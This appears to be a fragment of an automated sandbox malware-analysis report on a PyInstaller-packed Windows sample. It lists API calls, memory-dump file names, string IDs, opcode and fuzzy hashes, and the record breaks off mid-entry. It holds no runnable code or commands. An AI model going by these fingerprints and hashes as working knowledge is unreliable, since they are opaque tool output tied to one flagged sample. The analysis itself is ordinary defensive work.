• MessageBoxW.USER32 ref: 00007FF7EAD02C2A
Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentMessageProcess
• String ID: WARNING$Warning$[PYI-%d:%ls]
• API String ID: 1672936522-3797743490
• Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
• Instruction ID: da505b91eaedee4c8d100829ab9c4c40a91cdb1d33957f570433fb2b5490e2bc
• Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
• Instruction Fuzzy Hash: 1721A172708B4142F711EB64F8847EAA3A5FB88784F800136EA8D57659DE3CE245C751
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7EAD01B99), ref: 00007FF7EAD02760
Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentProcess
• String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
• API String ID: 2050909247-1591803126
• Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
• Instruction ID: b3653a7480c60acb36a9dd249aad42a1c08dedfdf0c78cfb7d5841418f6292e5
• Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
• Instruction Fuzzy Hash: E2217C72A19B8182F720EB60B8817E6A7A4EB88784F800176FA8D4365DDF7CD1498651
APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: getservbynamehtons
                                                                                                                                                                                                                              • String ID: service/proto not found$socket.getservbyname$s|s:getservbyname
                                                                                                                                                                                                                              • API String ID: 3889749166-1257235949
                                                                                                                                                                                                                              • Opcode ID: 81776a8363e7915c76650aa2291702c83d97d5dac441e15644519e5976245378
                                                                                                                                                                                                                              • Instruction ID: 84abe6599e505b7d285148540287b41f9e0ffb6758c4298b0fc681afb8418461
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81776a8363e7915c76650aa2291702c83d97d5dac441e15644519e5976245378
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3111F61A1CB4782EA40DBA1E98437D6375FF8ABC5F550032DA8E43A64DF3CD445C746
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                              • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                              • Instruction ID: 0d68a3035b4517ca4c50f72d4311e48bb8cd06f2c2e59faff72b6f0653c3bdd8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3F0C231B0970681FB10EB20E48437AA320EF55760F940276C66E461ECDF7CE148C331
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1495132572.00007FF8E80F1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8E80F0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494989941.00007FF8E80F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E80FE000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E8111000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811A000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495565226.00007FF8E8121000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495640960.00007FF8E8123000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e80f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Cert$Store$00007CertificateCertificatesCloseContextE707EnumErrorFreeLastOpen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 888773134-0
                                                                                                                                                                                                                              • Opcode ID: 7eb488ba5e32441d0f01a54a1631f0afa1a8ca53c20eef8b2eeae5f161c725b6
                                                                                                                                                                                                                              • Instruction ID: ee67071971a77a5e676ef8de701560801d078df7fc4c2309684a926776d50447
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7eb488ba5e32441d0f01a54a1631f0afa1a8ca53c20eef8b2eeae5f161c725b6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67813C35A4DA4285FE55AFA5AA1433D22A5BF48BD8F4CC430DD0E067D1DF3DA45AC30A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1495132572.00007FF8E80F1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8E80F0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494989941.00007FF8E80F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E80FE000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E8111000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811A000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495565226.00007FF8E8121000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495640960.00007FF8E8123000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e80f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Cert$Store$00007CloseContextE707EnumErrorFreeLastOpen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2569391109-0
                                                                                                                                                                                                                              • Opcode ID: e918e1c0eddfe07976633dd5ae524c922d6a439c169cdbef9b1a398d1dea870d
                                                                                                                                                                                                                              • Instruction ID: aa9d8041458669c99523e430c5c1926af2619afaf7e834a6144ed040e04a1720
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e918e1c0eddfe07976633dd5ae524c922d6a439c169cdbef9b1a398d1dea870d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1510C32E8DA5286FE595FA1991433D22A5AF89BDAF5CC430CD0E4A7D4DF3CA441C70A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeTable$ConvertInterfaceLuidNameTable2
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1671601251-0
                                                                                                                                                                                                                              • Opcode ID: 04bc949163b978593711b8e016bbaabdb93266c53af34e1d09aed761846783f8
                                                                                                                                                                                                                              • Instruction ID: 2fdc2815cd17ffee97ca74025f7b1213bbd34f6dbcc83861b59f261669211276
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007F8751250
                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_server_name
                                                                                                                                                                                                                              • API String ID: 4189947146-4157686371
                                                                                                                                                                                                                              • Opcode ID: df7c5cc1c5450ab236299e71f02084b029a770e3f54b11b68fceadd1af193070
                                                                                                                                                                                                                              • Instruction ID: 2d71aadb9e0b32e711d3d6e5e1b2f0db0d9365fdf4c15c8ca5e0b03cbb6067e4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df7c5cc1c5450ab236299e71f02084b029a770e3f54b11b68fceadd1af193070
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B612521F1CA8241F7619BE1E4127BE6391EF857C4F484036EE6D4BA86EF2CE5908702
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007F9060208
                                                                                                                                                                                                                              • String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new$ssl_get_new_session
                                                                                                                                                                                                                              • API String ID: 3464486852-2527649602
                                                                                                                                                                                                                              • Opcode ID: 443d78a4e3b3249df96229489038a3b10db514096114595ff1d68b200bf7cc61
                                                                                                                                                                                                                              • Instruction ID: a71305a7348b7528735c4420c908437be6bd95b0f1a8920254d7020936fa9126
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 443d78a4e3b3249df96229489038a3b10db514096114595ff1d68b200bf7cc61
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2271AD21B08AC282FB48DBA5E8567FD3291EB84BC4F584135DA2D477D6EF3DE5918302
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                              • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                              • Instruction ID: ab2047001a50b041f61c36572c0e40ef350eed9651f876fd83d0bfdca23d7181
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2518132A196028AEB14EB15E484779B792EF84B9CF904177EA8E4774CDF7CE841C711
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                              • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                              • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                              • Instruction ID: 32d7097a487a524cb60571632e0e6ec79fd7304bc9c24c450ee0a39434292182
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0951823260834286FB64EA21908436EB7D6FB59B98FA48177DA4C47B89CF3CE451C712
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                              • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                              • Instruction ID: d21d4bc1030ff94c50f310ac91b866b3a8e9e89ecb24f393cdf84b1a0ba57750
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D618232908BC585E760EB25E4803AEB7A1FB98788F544276EB9C03759CF7CD190CB11
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1488870171.00007FF8E7961000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FF8E7960000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488485527.00007FF8E7960000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E79AA000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E79B8000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A07000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A0C000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A0F000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489614277.00007FF8E7A10000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489734191.00007FF8E7A12000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7960000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007F906026570
                                                                                                                                                                                                                              • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                              • API String ID: 1666080152-87138338
                                                                                                                                                                                                                              • Opcode ID: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
                                                                                                                                                                                                                              • Instruction ID: 4aa9079d802410afe4e66de35c465f2f2314a02e11a8fee58e2971c68e0e8e82
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4241E3B2B0864386EB14AFD8E44836D6752EF91BD0F544330EA7946AE9DF3CD5028B41
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007E6784
                                                                                                                                                                                                                              • String ID: ..\s\ssl\tls_srp.c
                                                                                                                                                                                                                              • API String ID: 3284476089-1778748169
                                                                                                                                                                                                                              • Opcode ID: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
                                                                                                                                                                                                                              • Instruction ID: c3847b679368f1c5733ec763b45dcc74e8eb7b594c62e8d59a61578999a180df
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB413F65B0BA8380EA55AFE1E4527BC3292AF41FC8F184574DE7D0BBC9DF2CA4518212
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF7EAD0352C,?,00000000,00007FF7EAD03F23), ref: 00007FF7EAD07F32
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateDirectory
                                                                                                                                                                                                                              • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                              • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                              • Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                                                                                                                                                                                              • Instruction ID: df1133399f990eec0029a3c2bf0e5599327757a551e291416c3c5cf70455a6bc
